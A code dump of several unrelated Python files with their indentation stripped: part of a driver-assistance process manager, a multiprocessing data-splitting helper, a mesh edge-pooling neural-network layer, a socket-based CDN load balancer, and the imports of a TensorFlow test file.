# due to qualcomm kernel bugs SIGKILLing camerad sometimes causes page table corruption
unkillable_processes = ['camerad']
# processes to end with SIGKILL instead of SIGTERM
kill_processes = []
if EON:
kill_processes += [
'sensord',
]
persistent_processes = [
'pandad',
'thermald',
'logmessaged',
'ui',
'uploader',
'deleter',
]
if not PC:
persistent_processes += [
'updated',
'tombstoned',
]
if EON:
persistent_processes += [
'sensord',
]
if TICI:
managed_processes["timezoned"] = "selfdrive.timezoned"
persistent_processes += ['timezoned']
car_started_processes = [
'controlsd',
'plannerd',
'loggerd',
'radard',
'calibrationd',
'paramsd',
'camerad',
'modeld',
'proclogd',
'locationd',
'clocksd',
'logcatd',
]
driver_view_processes = [
'camerad',
'dmonitoringd',
'dmonitoringmodeld'
]
if not PC or WEBCAM:
car_started_processes += [
'ubloxd',
'dmonitoringd',
'dmonitoringmodeld',
]
if EON:
car_started_processes += [
'rtshield',
]
else:
car_started_processes += [
'sensord',
]
def register_managed_process(name, desc, car_started=False):
global managed_processes, car_started_processes, persistent_processes
managed_processes[name] = desc
if car_started:
car_started_processes.append(name)
else:
persistent_processes.append(name)
# ****************** process management functions ******************
def nativelauncher(pargs, cwd):
# exec the process
os.chdir(cwd)
os.execvp(pargs[0], pargs)
def start_managed_process(name):
if name in running or name not in managed_processes:
return
proc = managed_processes[name]
if isinstance(proc, str):
cloudlog.info("starting python %s" % proc)
running[name] = Process(name=name, target=launcher, args=(proc,))
else:
pdir, pargs = proc
cwd = os.path.join(BASEDIR, pdir)
cloudlog.info("starting process %s" % name)
running[name] = Process(name=name, target=nativelauncher, args=(pargs, cwd))
running[name].start()
def start_daemon_process(name):
params = Params()
proc, pid_param = daemon_processes[name]
pid = params.get(pid_param, encoding='utf-8')
if pid is not None:
try:
os.kill(int(pid), 0)
with open(f'/proc/{pid}/cmdline') as f:
if proc in f.read():
# daemon is running
return
except (OSError, FileNotFoundError):
# process is dead
pass
cloudlog.info("starting daemon %s" % name)
proc = subprocess.Popen(['python', '-m', proc], # pylint: disable=subprocess-popen-preexec-fn
stdin=open('/dev/null', 'r'),
stdout=open('/dev/null', 'w'),
stderr=open('/dev/null', 'w'),
preexec_fn=os.setpgrp)
params.put(pid_param, str(proc.pid))
def prepare_managed_process(p):
proc = managed_processes[p]
if isinstance(proc, str):
# import this python
cloudlog.info("preimporting %s" % proc)
importlib.import_module(proc)
def join_process(process, timeout):
# Process().join(timeout) will hang due to a python 3 bug: https://bugs.python.org/issue28382
# We have to poll the exitcode instead
t = time.time()
while time.time() - t < timeout and process.exitcode is None:
time.sleep(0.001)
def kill_managed_process(name, retry=True):
if name not in running or name not in managed_processes:
return
cloudlog.info(f"killing {name}")
if running[name].exitcode is None:
sig = signal.SIGKILL if name in kill_processes else signal.SIGINT
os.kill(running[name].pid, sig)
join_process(running[name], 5)
if running[name].exitcode is None:
if not retry:
raise Exception(f"{name} failed to die")
if name in unkillable_processes:
cloudlog.critical("unkillable process %s failed to exit! rebooting in 15 if it doesn't die" % name)
join_process(running[name], 15)
if running[name].exitcode is None:
cloudlog.critical("unkillable process %s failed to die!" % name)
os.system("date >> /data/unkillable_reboot")
os.sync()
HARDWARE.reboot()
raise RuntimeError
else:
cloudlog.info("killing %s with SIGKILL" % name)
os.kill(running[name].pid, signal.SIGKILL)
running[name].join()
ret = running[name].exitcode
cloudlog.info(f"{name} is dead with {ret}")
del running[name]
return ret
def cleanup_all_processes(signal, frame):
cloudlog.info("caught ctrl-c %s %s" % (signal, frame))
if EON:
pm_apply_packages('disable')
for name in list(running.keys()):
kill_managed_process(name)
cloudlog.info("everything is dead")
def send_managed_process_signal(name, sig):
if name not in running or name not in managed_processes or \
running[name].exitcode is not None:
return
cloudlog.info(f"sending signal {sig} to {name}")
os.kill(running[name].pid, sig)
# ****************** run loop ******************
def manager_init():
os.umask(0) # Make sure we can create files with 777 permissions
# Create folders needed for msgq
try:
os.mkdir("/dev/shm")
except FileExistsError:
pass
except PermissionError:
print("WARNING: failed to make /dev/shm")
# set dongle id
reg_res = register(spinner)
if reg_res:
dongle_id = reg_res
else:
raise Exception("server registration failed")
os.environ['DONGLE_ID'] = dongle_id
if not dirty:
os.environ['CLEAN'] = '1'
cloudlog.bind_global(dongle_id=dongle_id, version=version, dirty=dirty,
device=HARDWARE.get_device_type())
crash.bind_user(id=dongle_id)
crash.bind_extra(version=version, dirty=dirty, device=HARDWARE.get_device_type())
# ensure shared libraries are readable by apks
if EON:
os.chmod(BASEDIR, 0o755)
os.chmod("/dev/shm", 0o777)
os.chmod(os.path.join(BASEDIR, "cereal"), 0o755)
os.chmod(os.path.join(BASEDIR, "cereal", "libmessaging_shared.so"), 0o755)
def manager_thread():
cloudlog.info("manager start")
cloudlog.info({"environ": os.environ})
# save boot log
subprocess.call("./bootlog", cwd=os.path.join(BASEDIR, "selfdrive/loggerd"))
# start daemon processes
for p in daemon_processes:
start_daemon_process(p)
# start persistent processes
for p in persistent_processes:
start_managed_process(p)
# start offroad
if EON and "QT" not in os.environ:
pm_apply_packages('enable')
start_offroad()
if os.getenv("NOBOARD") is not None:
del managed_processes["pandad"]
if os.getenv("BLOCK") is not None:
for k in os.getenv("BLOCK").split(","):
del managed_processes[k]
started_prev = False
logger_dead = False
params = Params()
device_state_sock = messaging.sub_sock('deviceState')
pm = messaging.PubMaster(['managerState'])
while 1:
msg = messaging.recv_sock(device_state_sock, wait=True)
if msg.deviceState.freeSpacePercent < 5:
logger_dead = True
if msg.deviceState.started:
for p in car_started_processes:
if p == "loggerd" and logger_dead:
kill_managed_process(p)
else:
start_managed_process(p)
else:
logger_dead = False
driver_view = params.get("IsDriverViewEnabled") == b"1"
# TODO: refactor how manager manages processes
for p in reversed(car_started_processes):
if p not in driver_view_processes or not driver_view:
kill_managed_process(p)
for p in driver_view_processes:
if driver_view:
start_managed_process(p)
else:
kill_managed_process(p)
# trigger an update after going offroad
if started_prev:
os.sync()
send_managed_process_signal("updated", signal.SIGHUP)
started_prev = msg.deviceState.started
# check the status of all processes, did any of them die?
running_list = ["%s%s\u001b[0m" % ("\u001b[32m" if running[p].is_alive() else "\u001b[31m", p) for p in running]
cloudlog.debug(' '.join(running_list))
# send managerState
states = []
for p in managed_processes:
state = log.ManagerState.ProcessState.new_message()
state.name = p
if p in running:
state.running = running[p].is_alive()
state.pid = running[p].pid
state.exitCode = running[p].exitcode or 0
states.append(state)
msg = messaging.new_message('managerState')
msg.managerState.processes = states
pm.send('managerState', msg)
# Exit main loop when uninstall is needed
if params.get("DoUninstall", encoding='utf8') == "1":
break
def manager_prepare():
# build all processes
os.chdir(os.path.dirname(os.path.abspath(__file__)))
total = 100.0 - (0 if PREBUILT else MAX_BUILD_PROGRESS)
for i, p in enumerate(managed_processes):
perc = (100.0 - total) + total * (i + 1) / len(managed_processes)
spinner.update_progress(perc, 100.)
prepare_managed_process(p)
def main():
params = Params()
params.manager_start()
default_params = [
("CommunityFeaturesToggle", "0"),
("CompletedTrainingVersion", "0"),
("IsRHD", "0"),
("IsMetric", "0"),
("RecordFront", "0"),
("HasAcceptedTerms", "0"),
("HasCompletedSetup", "0"),
("IsUploadRawEnabled", "1"),
("IsLdwEnabled", "1"),
("LastUpdateTime", datetime.datetime.utcnow().isoformat().encode('utf8')),
("OpenpilotEnabledToggle", "1"),
("VisionRadarToggle", "0"),
("LaneChangeEnabled", "1"),
("IsDriverViewEnabled", "0"),
]
# set unset params
for k, v in default_params:
if params.get(k) is None:
params.put(k, v)
# is this dashcam?
if os.getenv("PASSIVE") is not None:
params.put("Passive", str(int(os.getenv("PASSIVE"))))
if params.get("Passive") is None:
raise Exception("Passive must be set to continue")
if EON:
update_apks()
manager_init()
manager_prepare()
spinner.close()
if os.getenv("PREPAREONLY") is not None:
return
# SystemExit on sigterm
signal.signal(signal.SIGTERM, lambda signum, frame: sys.exit(1))
try:
manager_thread()
except Exception:
traceback.print_exc()
crash.capture_exception()
finally:
cleanup_all_processes(None, None)
if params.get("DoUninstall", encoding='utf8') == "1":
cloudlog.warning("uninstalling")
HARDWARE.uninstall()
if __name__ == "__main__":
try:
main()
except Exception:
add_logentries_handler(cloudlog)
cloudlog.exception("Manager failed to start")
# Show last 3 lines of traceback
error = traceback.format_exc(-3)
error = "Manager failed to start\n\n" + error
spinner.close()
with TextWindow(error) as t:
t.wait_for_exit()
raise
# manual exit because we are forked
sys.exit(0)
|
multiprocess_utils.py
|
import logging
from multiprocessing import Process
from time import time
import numpy as np
import tensorflow as tf
from multiprocessing.sharedctypes import RawArray
def split_share_data(rows, cols, coocs, split_n):
"""
This method takes the rows, cols and cooc(currence) from the glove co-occurrence sparse matrix and splits it
in sub-lists, formatted in RawArray to be accessed by multiple processes in parallel.
This allows keeps the GIL from replicating the memory space when multiprocessing
:param rows: indexes of the non-empty rows of the co-occurrence matrix
:param cols: indexes of the non-empty cols of the co-occurrence matrix
:param coocs: non-empty values of the co-occurrence matrix
:param split_n: number in which split the arrays
:return: 3 lists of RawArrays
"""
total_length = len(rows)
raws_rows_list = list()
raws_cols_list = list()
raws_coocs_list = list()
for ix in range(split_n):
min_ix = ix * total_length // split_n
max_ix = min((ix + 1) * total_length // split_n, total_length - 1)
split_len = max_ix - min_ix
# Create the empty RawArrays
rows_raw = RawArray(typecode_or_type='i', size_or_initializer=split_len)
cols_raw = RawArray(typecode_or_type='i', size_or_initializer=split_len)
coocs_raw = RawArray(typecode_or_type='f', size_or_initializer=split_len)
# Cast the c-types to numpy types, and reshape
rows_np = np.frombuffer(rows_raw, dtype=np.int32).reshape(split_len)
cols_np = np.frombuffer(cols_raw, dtype=np.int32).reshape(split_len)
coocs_np = np.frombuffer(coocs_raw, dtype=np.float32).reshape(split_len)
# Copy data to our shared array
np.copyto(rows_np, rows[min_ix: max_ix])
np.copyto(cols_np, cols[min_ix: max_ix])
np.copyto(coocs_np, coocs[min_ix: max_ix])
# Add data to the lists
raws_rows_list.append(rows_raw)
raws_cols_list.append(cols_raw)
raws_coocs_list.append(coocs_raw)
return raws_rows_list, raws_cols_list, raws_coocs_list
def parallelize_function(function, parallel_n, *iterables):
"""
Parallelize a function between parallel_n processes,
the tf.train.Coordinator allows for the tfrecords
:param function: function to parallelize
:param parallel_n: number of processes to run in parallel
:param iterables: elements to apply the function on
:return: None
"""
coord = tf.train.Coordinator()
processes = []
start_time = time()
for process_ix in range(parallel_n):
args = tuple([iterable[process_ix] for iterable in iterables])
p = Process(target=function, args=args)
p.start()
processes.append(p)
coord.join(processes)
logging.info(f"Saved to tfrecords {time() - start_time:2f} seconds")
|
mesh_pool.py
|
import torch
import torch.nn as nn
from threading import Thread
from models.layers.mesh_union import MeshUnion
import numpy as np
from heapq import heappop, heapify
import pdb
class MeshPool(nn.Module):
def __init__(self, target, multi_thread=False):
print(f'target edges: {target}')
super(MeshPool, self).__init__()
self.__out_target = target
self.__multi_thread = multi_thread
self.__fe = None
self.__updated_fe = None
self.__meshes = None
self.__merge_edges = [-1, -1]
def __call__(self, fe, meshes):
return self.forward(fe, meshes)
def forward(self, fe, meshes):
# for each mesh call __pool_main
# to do it parallely create threads and collect result.
# fe.shape -> [1, 16, 16]
self.__updated_fe = [[] for _ in range(len(meshes))] # len(meshes) -> 1
# self.__updated_fe = [[]]
pool_threads = []
self.__fe = fe
self.__meshes = meshes
# iterate over batch
for mesh_index in range(len(meshes)):
if self.__multi_thread:
pool_threads.append(Thread(target=self.__pool_main, args=(mesh_index,)))
pool_threads[-1].start()
else:
self.__pool_main(mesh_index)
if self.__multi_thread:
for mesh_index in range(len(meshes)):
pool_threads[mesh_index].join()
out_features = torch.cat(self.__updated_fe).view(len(meshes), -1, self.__out_target)
return out_features
def __pool_main(self, mesh_index):
mesh = self.__meshes[mesh_index]
# build a priority queue for the mesh edges
# check - http://staff.ustc.edu.cn/~csli/graduate/algorithms/book6/chap07.htm for details
# lowest mag edges at top of heap
# these edges get removed first
queue = self.__build_queue(self.__fe[mesh_index, :, :mesh.edges_count], mesh.edges_count)
# recycle = []
# last_queue_len = len(queue)
last_count = mesh.edges_count + 1
mask = np.ones(mesh.edges_count, dtype=np.bool)
edge_groups = MeshUnion(mesh.edges_count, self.__fe.device)
print(self.__out_target)
# pdb.set_trace()
while mesh.edges_count > self.__out_target:
value, edge_id = heappop(queue)
# print(edge_id)
edge_id = int(edge_id)
# if edge_id in [8, 19, 20, 25]:
# if edge_id == 19:
# pdb.set_trace()
# else:
# continue
if mask[edge_id]:
self.__pool_edge(mesh, edge_id, mask, edge_groups)
mesh.clean(mask, edge_groups)
fe = edge_groups.rebuild_features(self.__fe[mesh_index], mask, self.__out_target)
self.__updated_fe[mesh_index] = fe
def __pool_edge(self, mesh, edge_id, mask, edge_groups):
if self.has_boundaries(mesh, edge_id):
# if its a boundary edge like [A, D] you cannot pool it
return False
elif self.__clean_side(mesh, edge_id, mask, edge_groups, 0)\
and self.__clean_side(mesh, edge_id, mask, edge_groups, 2) \
and self.__is_one_ring_valid(mesh, edge_id):
self.__merge_edges[0] = self.__pool_side(mesh, edge_id, mask, edge_groups, 0) # edge_id=19, mask -> all ones
# redirected gemm edges from edges 18 and 19, deleted edge 18, total edges = 32
# self.__merge_edges[0] = 20
self.__merge_edges[1] = self.__pool_side(mesh, edge_id, mask, edge_groups, 2) # edge_id=19, mask -> all ones
# self.__merge_edges = [18, 12]
# self.__merge_edges = [20, 5]
mesh.merge_vertices(edge_id) # edge_id -> 19
mask[edge_id] = False
MeshPool.__remove_group(mesh, edge_groups, edge_id)
mesh.edges_count -= 1
return True
else:
return False
def __clean_side(self, mesh, edge_id, mask, edge_groups, side):
if mesh.edges_count <= self.__out_target:
# if your number of edges are less than what you intend to have after pooling
# then you do not need to pool the edge
return False
invalid_edges = MeshPool.__get_invalids(mesh, edge_id, edge_groups, side)
while len(invalid_edges) != 0 and mesh.edges_count > self.__out_target:
self.__remove_triplete(mesh, mask, edge_groups, invalid_edges)
if mesh.edges_count <= self.__out_target:
return False
if self.has_boundaries(mesh, edge_id):
return False
invalid_edges = self.__get_invalids(mesh, edge_id, edge_groups, side)
return True
@staticmethod
def has_boundaries(mesh, edge_id):
# if edge is like the [A, D] edge
# if any of your neighbors are boundary edges like [A, D] you cannot pool that edge
for edge in mesh.gemm_edges[edge_id]:
if edge == -1 or -1 in mesh.gemm_edges[edge]:
return True
return False
@staticmethod
def __is_one_ring_valid(mesh, edge_id):
# edge_id = 19, 4 nbrs - [15, 8, 5, 12]
# v_a = vertices of edge_id [12, 13] FJ
v_a = set(mesh.edges[mesh.ve[mesh.edges[edge_id, 0]]].reshape(-1)) # set of edge ids 12 belongs to - length is 6
v_b = set(mesh.edges[mesh.ve[mesh.edges[edge_id, 1]]].reshape(-1)) # set of edge ids 13 belongs to - length is 6
# v_a = {4, 5, 6, 7, 12, 13, 14}
# v_b = {2, 4, 11, 12, 13, 14, 15}
# v_a & v_b - {13, 4, 12, 14}
# {13, 4, 12, 14} - {12, 13} = {4, 14}
shared = v_a & v_b - set(mesh.edges[edge_id])
return len(shared) == 2
def __pool_side(self, mesh, edge_id, mask, edge_groups, side):
info = MeshPool.__get_face_info(mesh, edge_id, side)
key_a, key_b, side_a, side_b, _, other_side_b, _, other_keys_b = info
# (20, 18, 1, 0, 2, 2, [15, 22], [25, 8])
self.__redirect_edges(mesh, key_a, side_a - side_a % 2, other_keys_b[0], mesh.sides[key_b, other_side_b])
# mesh.gemm_edges[20] = [18, 19, 15, 22] -> [25, 19, 15, 22] # 18 replaced with 25
# mesh.gemm_edges[25] = [26, 24, 8, 18] -> [26, 24, 8, 20] # 18 replaced with 20
self.__redirect_edges(mesh, key_a, side_a - side_a % 2 + 1, other_keys_b[1], mesh.sides[key_b, other_side_b + 1])
# mesh.gemm_edges[20] = [25, 19, 15, 22] -> [25, 8, 15, 22] # 19 replaced by 8
# mesh.gemm_edges[8] = [ 6, 7, 18, 25] -> [ 6, 7, 20, 25] # 18 replaced by 20
MeshPool.__union_groups(mesh, edge_groups, key_b, key_a) # groups[20,:] = zeros except at 20 and 18
MeshPool.__union_groups(mesh, edge_groups, edge_id, key_a) # groups[20,:] = zeros except at 20, 18 and 19
mask[key_b] = False # mask[18] = False, 2nd pass key_b = 12
# redirect all edges from 18 and 12 and remove edge 18 and 12
MeshPool.__remove_group(mesh, edge_groups, key_b) # no changes initially as there is no history object
mesh.remove_edge(key_b) # remove edge_id association with vertices of that edge.
mesh.edges_count -= 1 # decrease overall count of edges
# second time
# (5, 12, 3, 2, 0, 0, [3, 4], [13, 14])
# mesh.gemm_edges[5] -> [ 3, 4, 12, 19] -> [ 3, 4, 13, 19] # 12 replaced by 13
# mesh.gemm_edges[13] -> [14, 12, -1, -1] -> [14, 5, -1, -1] # 12 replaced by 5
# mesh.gemm_edges[5] -> [ 3, 4, 13, 19] -> [ 3, 4, 13, 14] # 19 replaced by 14
# mesh.gemm_edges[14] -> [12, 13, 9, 16] -> [ 5, 13, 9, 16] $ 12 replaced with 5
# union groups -> groups[5, :] = all zeros except 5, 12
# union groups -> groups[5, :] = all zeros except 5, 12, 19
# mask[12] -> False
# remove edge with edge_id 12
return key_a, # final_return key_a = 5
@staticmethod
def __get_invalids(mesh, edge_id, edge_groups, side):
info = MeshPool.__get_face_info(mesh, edge_id, side)
key_a, key_b, side_a, side_b, other_side_a, other_side_b, other_keys_a, other_keys_b = info
# main_edge = 19, key_a = 20, key_b = 18 // FJ, JG, FG
# mesh.sides[edge_id] or mesh.sides[19] = [1, 0, 3, 2] // [key_b, key_a, nbr_other_a, nbr_other_b]
# side_a = 1, side_b = 0, other_side_a = 2, other_side_b = 2
# other_keys_a = [mesh.gemm_edges[key_a, other_side_a], mesh.gemm_edges[key_a, other_side_a + 1]]
# triangles supported by face nbrs are accounted
# other_keys_b = [mesh.gemm_edges[key_b, other_side_b], mesh.gemm_edges[key_b, other_side_b + 1]]
# other_keys_a = [15, 22], other_keys_b = [25, 8] // (CF, CG), (GK, JK)
shared_items = MeshPool.__get_shared_items(other_keys_a, other_keys_b)
# if there are no shared items in other_keys_a and other_keys_b then its valid
#
if len(shared_items) == 0:
return []
else:
# ignoring this condition as it doesnt occur in my example
# it would occur for case 2 kind of edges
assert (len(shared_items) == 2)
# let GK be shared, then other_keys_a = [15, 25], other_keys_b = [25, 8], shared_items = [1, 0]
middle_edge = other_keys_a[shared_items[0]] # middle_edge = 25
update_key_a = other_keys_a[1 - shared_items[0]] # update_key_a = 15
update_key_b = other_keys_b[1 - shared_items[1]] # update_key_b = 8
update_side_a = mesh.sides[key_a, other_side_a + 1 - shared_items[0]] # update_side_a = 3
update_side_b = mesh.sides[key_b, other_side_b + 1 - shared_items[1]] # update_side_b = 2
# redirect_edges(FJ, CF, sides) here
MeshPool.__redirect_edges(mesh, edge_id, side, update_key_a, update_side_a)
MeshPool.__redirect_edges(mesh, edge_id, side + 1, update_key_b, update_side_b) # 19, 1, 8, 2
MeshPool.__redirect_edges(mesh, update_key_a, MeshPool.__get_other_side(update_side_a), update_key_b, MeshPool.__get_other_side(update_side_b))
# 15, 2, 8, 3
MeshPool.__union_groups(mesh, edge_groups, key_a, edge_id) # zeros(33x33), 20, 19, # groups[19,:] = all zeros except at position 19, 20
MeshPool.__union_groups(mesh, edge_groups, key_b, edge_id) # (33x33), 18, 19, groups[19, :] = all zeros except at 18, 19, 20 position
MeshPool.__union_groups(mesh, edge_groups, key_a, update_key_a) # groups[15,:] = all zeros except at position 20, 15
MeshPool.__union_groups(mesh, edge_groups, middle_edge, update_key_a) # groups[15,:] = all zeros except at position 20, 15, 25
MeshPool.__union_groups(mesh, edge_groups, key_b, update_key_b) # groups[8,:] = all zeros except at position 18, 8
MeshPool.__union_groups(mesh, edge_groups, middle_edge, update_key_b) # groups[8,:] = all zeros except at position 18, 8, 25
return [key_a, key_b, middle_edge] # 20, 18, 25, (GF, GJ, GK) edges are considered invalid
@staticmethod
def __redirect_edges(mesh, edge_a_key, side_a, edge_b_key, side_b):
# 19 - FJ, side_a = 0, CF - edge_b_key = 15, side_b = 3
# 19 - gemm edges [20, 18, 5, 12] # FG, JG, IJ, IF
# 15 - gemm edges [16, 17, 22, 20] # BF, BC, CG, FG
# mesh.sides[19] - [1,0,3,2], mesh.sides[15] - [1,0,3,2]
mesh.gemm_edges[edge_a_key, side_a] = edge_b_key # replace FG with FK
mesh.gemm_edges[edge_b_key, side_b] = edge_a_key # replace FG with FJ
mesh.sides[edge_a_key, side_a] = side_b # mesh.sides[19, 0] = 3
mesh.sides[edge_b_key, side_b] = side_a # mesh.sides[15, 3] = 0
# mesh.gemm_edges[19] = [20, 18, 5, 12] -> [15, 18, 5, 12]
# mesh.gemm_edges[15] = [16, 17, 22, 20] -> [16, 17, 22, 19]
# second time
# mesh.gemm_edges[19] = [15, 18, 5, 12] -> [15, 8, 5, 12]
# mesh.gemm_edges[8] = [6, 7, 18, 25] -> [6, 7, 19, 25]
# 19 - FJ, side_a = 1, side_b = 2, JK edge_b_key = 8, gemm edges a - FK, JK, IJ, IF
# gemm edges b - NK, NJ, JG, GK
# 19 - gemm edges [15, 8, 5, 12] # replace 8 with 8
# 8 - gemm edges [ 6, 7, 18, 25] # replace 18 with 19 , replace JG with FJ
# third time
# 15, 2, 8, 3
# mesh.gemm_edges[15] = [16, 17, 22, 19] -> [16, 17, 8, 19]
# mesh.gemm_edges[8] = [6, 7, 19, 25] -> [6,7, 19, 15]
# in total final gemm_edges are as follows
# mesh.gemm_edges[19] = [15, 8, 5, 12]
# mesh.gemm_edges[15] = [16, 17, 8, 19]
# mesh.gemm_edges[8] = [6, 7, 19, 15]
@staticmethod
def __get_shared_items(list_a, list_b):
# [1, 30], [29, 3]
shared_items = []
for i in range(len(list_a)):
for j in range(len(list_b)):
if list_a[i] == list_b[j]:
shared_items.extend([i, j])
return shared_items
@staticmethod
def __get_other_side(side):
return side + 1 - 2 * (side % 2)
# oside for updated side a -> 3 + 1 - 2* (3 % 2) = 2
# oside for updated side b -> 2 + 1 - 2*(2%2) = 3
@staticmethod
def __get_face_info(mesh, edge_id, side):
'''
key_a - edge_id of sister edge, JG
key_b - edge_id of sister edge, GK
Sides tell the order in which the edge neighbors are placed
side_a -
'''
key_a = mesh.gemm_edges[edge_id, side]
key_b = mesh.gemm_edges[edge_id, side + 1]
side_a = mesh.sides[edge_id, side]
side_b = mesh.sides[edge_id, side + 1]
other_side_a = (side_a - (side_a % 2) + 2) % 4
other_side_b = (side_b - (side_b % 2) + 2) % 4
other_keys_a = [mesh.gemm_edges[key_a, other_side_a], mesh.gemm_edges[key_a, other_side_a + 1]]
other_keys_b = [mesh.gemm_edges[key_b, other_side_b], mesh.gemm_edges[key_b, other_side_b + 1]]
return key_a, key_b, side_a, side_b, other_side_a, other_side_b, other_keys_a, other_keys_b
@staticmethod
def __remove_triplete(mesh, mask, edge_groups, invalid_edges):
vertex = set(mesh.edges[invalid_edges[0]])
for edge_key in invalid_edges:
vertex &= set(mesh.edges[edge_key])
mask[edge_key] = False
MeshPool.__remove_group(mesh, edge_groups, edge_key)
mesh.edges_count -= 3
vertex = list(vertex)
assert(len(vertex) == 1)
mesh.remove_vertex(vertex[0])
def __build_queue(self, features, edges_count):
# features - [16, 16]
# create a heap based on unsqared L2 norm of features of each edge
# we do this because we need to delete the edges with the smallest unsquared L2 norm
squared_magnitude = torch.sum(features * features, 0) # shape -> [16,]
if squared_magnitude.shape[-1] != 1:
squared_magnitude = squared_magnitude.unsqueeze(-1) # shape -> [16, 1]
edge_ids = torch.arange(edges_count, device=squared_magnitude.device, dtype=torch.float32).unsqueeze(-1) # 16 x 1
heap = torch.cat((squared_magnitude, edge_ids), dim=-1).tolist()
heapify(heap)
return heap
@staticmethod
def __union_groups(mesh, edge_groups, source, target):
edge_groups.union(source, target) # zeros(33x33), 20, 19
mesh.union_groups(source, target)
@staticmethod
def __remove_group(mesh, edge_groups, index):
edge_groups.remove_group(index)
mesh.remove_group(index)
|
loadBalancerPrimary.py
|
# receives request from the clients and forwards it to appropriate edgeServer/originServer
import sys
import socket
from threading import Timer, Thread, Lock
import time
sys.path.insert(0, "../")
from config import *
from messages.dns_request_message import *
from messages.lb_heartbeat_message import *
from messages.edge_heartbeat_message import *
from messages.client_req_lb_message import *
from messages.client_res_lb_message import *
####################################
# Global tables and lock variables #
####################################
edge_servers_available = [] # (loc_id, (ip,port)) entries
edge_servers_availableL = Lock()
edge_server_load = {}
edge_server_load_l = Lock()
####################################
def heartBeat():
while(True):
sock = socket.socket()
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
host = LOAD_BALANCER_PRIMARY_IP
port = LB_HEARTBEAT_PORT
sock.bind((host, port))
sock.listen(1)
print("LB-LB Heartbeat socket binded")
conn, addr = sock.accept()
print('Accepted', conn, 'from', addr)
print('Connected to backup load balancer')
while(True):
print("Sent HeartBeat")
msg = LBHeartbeatMessage()
try:
msg.send(conn)
except:
print("Connection to backup failed")
break
time.sleep(LB_HEARTBEAT_TIME)
def receive_heartbeat(conn, addr):
global edge_servers_available, edge_servers_availableL, edge_server_load, edge_server_load_l
print("Connection Established with ", addr)
# Edge server added
msg = EdgeHeartbeatMessage()
msg.receive(conn)
prev_load = -1
if msg.received:
print("New edge server connected", addr)
# prev_load = msg.load
edge_server_load_l.acquire()
edge_server_load[addr] = msg.load
edge_server_load_l.release()
prev_load = msg.load
edge_servers_availableL.acquire()
edge_servers_available.append((msg.loc, addr,msg.load))
edge_servers_availableL.release()
# Check for liveness
while True:
msg = EdgeHeartbeatMessage()
msg.receive(conn)
if msg.received == False:
break
if prev_load!=msg.load:
edge_server_load_l.acquire()
edge_server_load[addr] = msg.load
edge_server_load_l.release()
prev_load = msg.load
print("Heartbeat received from", addr)
print("Edge server ", addr, " failed")
# Edge server removed
for e,a in enumerate(edge_servers_available):
if a[1] == addr:
edge_servers_availableL.acquire()
edge_servers_available.pop(e)
edge_servers_availableL.release()
edge_server_load_l.acquire()
del edge_server_load[addr]
edge_server_load_l.release()
break
conn.close()
def edge_heartbeat_handler():
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
host = LOAD_BALANCER_PRIMARY_IP
port = LB1_HEARTBEAT_LISTENER_PORT
sock.bind((host,port))
sock.listen(MAX_EDGE_SERVERS)
threads = []
while True:
c, addr = sock.accept()
t = Thread(target = receive_heartbeat,args = (c,addr))
threads.append(t)
t.start()
sock.close()
def dist(loc_id1, loc_id2):
global LOCATION
print(LOCATION[loc_id1])
return (LOCATION[loc_id1][0]-LOCATION[loc_id2][0])**2 + (LOCATION[loc_id1][1]-LOCATION[loc_id2][1])**2
def serve_client(conn, addr):
global edge_servers_available, edge_servers_availableL, edge_server_load, edge_server_load_l
msg = ClientReqLBMessage()
msg.receive(conn)
if msg.received:
print("Received request: loc id ", msg.loc_id, " from ", addr)
loc_id = msg.loc_id
# look in edge_servers_available after acquiring lock
edge_servers_availableL.acquire()
# At least one edge server would be available
if(len(edge_servers_available)==1):
msg = ClientResLBMessage(*edge_servers_available[0][1])
edge_servers_availableL.release()
msg.send(conn)
conn.close()
return
if(len(edge_servers_available)==0):
msg = ClientResLBMessage('0.0.0.0',EDGE_SERVER_PORT)
edge_servers_availableL.release()
msg.send(conn)
conn.close()
return
min_dist = sys.maxsize
cur_load = sys.maxsize
best_server_index = 0
for e,server in enumerate(edge_servers_available):
if server[1]==msg.prev_edge_ip:
if e == 0:
best_server_index = 1
continue
cur_dist = dist(server[0], loc_id)
edge_server_load_l.acquire()
if WEIGHT_DISTANCE*min_dist+WEIGHT_LOAD*cur_load > WEIGHT_DISTANCE*cur_dist+WEIGHT_LOAD*edge_server_load[edge_servers_available[e][1]]:
min_dist = cur_dist
cur_load = edge_server_load[edge_servers_available[e][1]]
best_server_index = e
edge_server_load_l.release()
msg = ClientResLBMessage(*edge_servers_available[best_server_index][1])
edge_servers_availableL.release()
msg.send(conn)
conn.close()
if __name__ == "__main__":
# Secondary Heartbeat thread
t_secondary_hb = Thread(target=heartBeat)
t_secondary_hb.start()
# Edge server handler thread
t_edge_server_hb = Thread(target = edge_heartbeat_handler)
t_edge_server_hb.start()
# Register itself to DNS
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host = DNS_IP
port = DNS_PORT
s.connect((host, port))
print("Adding IP to DNS")
msg = DNSRequestMessage(0, "www.mycdn.com", LOAD_BALANCER_PRIMARY_IP, LB_CLIENT_LISTEN_PORT)
msg.send(s)
s.close()
# Serve clients
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
host = LOAD_BALANCER_PRIMARY_IP
port = LB_CLIENT_LISTEN_PORT
sock.bind((host,port))
sock.listen(MAX_CLIENT_REQUESTS)
while(True):
c, addr = sock.accept()
t = Thread(target = serve_client,args = (c,addr))
t.start()
# Wait for other threads
t_secondary_hb.join()
t_edge_server_hb.join()
|
core_test.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for core."""
import collections.abc
import os
import pickle
import threading
import numpy as np
from tensorflow.core.protobuf import config_pb2
from tensorflow.python import pywrap_tfe
from tensorflow.python.eager import context
from tensorflow.python.eager import core
from tensorflow.python.eager import def_function
from tensorflow.python.eager import execute as execute_lib
